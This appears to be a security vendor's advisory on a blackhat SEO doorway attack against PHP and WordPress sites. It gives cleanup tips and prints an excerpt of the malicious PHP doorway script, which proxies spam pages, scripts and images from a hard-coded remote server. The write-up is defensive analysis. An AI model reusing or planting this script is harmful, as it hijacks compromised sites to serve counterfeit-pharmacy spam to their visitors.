Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself
.
"
One of the "Remote dorway content" injection attacks uses a doorway script that fetches spammy pages from a third-party server, an .htaccess file with rewrite rules that invokes the doorway script
for specific URL patters, and a backdoor (variation of the Filesman) with some additional functions that allow to inject spam into WordPress posts and generate the above mentioned .htaccess and doorway scripts.
The doorway fetches spammy content from some spammy site (usually couterfeit online pharmacy) on the fly. To remove references to resources on that third-party site, all images and css resources are also being load via this script.
Affecting
Any site on a server with PHP and enabled modules and functions that can download content from remote servers, e.g. file_get_contents, curl, etc. WordPress sites may be specifically targeted by this attack
Cleanup
In this case you need to find .htaccess file with malicous rewrite rules (it usually contain keywords like ximg, pand). This file will point at the doorway script that you need to delete. Then scan your server for backdoors.
You can sign up with us and let our team remove the malware for you.
Dump
... excerpts ....
$dor_dir = "http://xxx.xx.xx.xxx/redbutton/main2-dors/01a-040-3/";
function get_content2($URL){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $URL);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
if (isset($_SERVER["HTTP_REFERER"])) {
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
}
$result = curl_exec($ch);
if ( strpos($result, "Moved Permanently") !== false ) {
$r_url = preg_replace("/^.*hrefs*=s*["']([^"'>]+?)(["'>]+).*/is","$1",$result);
header("Location: " . $r_url);
exit;
}
curl_close($ch);
return $result;
}
if (isset($_GET["pand"])){
$page_to_get=$_GET["pand"];
$dir=substr($page_to_get,strrpos($page_to_get,'/') + 1);
$ext=substr($page_to_get,strrpos($page_to_get,'.') + 1);
if($ext=='html'){}
elseif($dir=='index'){
$page_to_get=$page_to_get.".html";
}
else{
$page_to_get=$page_to_get."/index.html";
}
$dor_way=$dor_dir.$page_to_get;
$dor_content=get_content2($dor_way);
$dor_content=preg_replace("#(<s*as+[^>]*hrefs*=s*["'])(?!http)([^"'>]+)(.html)(["'>]+)#","$1" . "/pand/" . "$2" . "$4", $dor_content);
$dor_content=preg_replace("#(<s*?links+[^>]*.*?hrefs*=s*["'])(.*?)(.css)(["'].*?>)#","$1".$_SERVER["SCRIPT_NAME"]."?xcss="."$2"."$4",$dor_content);
$dor_content=preg_replace("#(<s*?scripts+[^>]*.*?srcs*=s*["'])(.*?)(.js)(["'].*?>)#","$1".$_SERVER["SCRIPT_NAME"]."?xjs="."$2"."$4",$dor_content);
echo $dor_content;die();
}
if(isset($_GET["xcss"])){
$page_to_get=$_GET["xcss"];
$dor_way=$dor_dir.$page_to_get.".css";
header("Content-Type:text/css");
$css_content=get_content2($dor_way);
echo$css_content;
die();
}
if (isset($_GET["xjs"])){
$page_to_get=$_GET["xjs"];
$dor_way=$dor_dir.$page_to_get.".js";
header("Content-Type:text/javascript");
$css_content=get_content2($dor_way);
echo$css_content;
die();
}
if (isset($_GET["ximg"])) {
$page_to_get=$_GET["ximg"];
$ext_to_get=".".$_GET["ext"];
$dor_way =$dor_dir."images/".$page_to_get.$ext_to_get;
if (strpos($ext_to_get, "gif")>0) {
header("Content-Type: image/gif");
}
if (strpos($ext_to_get, "jpg")>0) {
header("Content-Type: image/jpeg");
}
if (strpos($ext_to_get, "jpeg")>0) {
header("Content-Type: image/jpeg");
}
if (strpos($ext_to_get, "png")>0){
header("Content-Type: image/png");
}
$css_content=get_content2($dor_way);
echo $css_content;
die();
}
...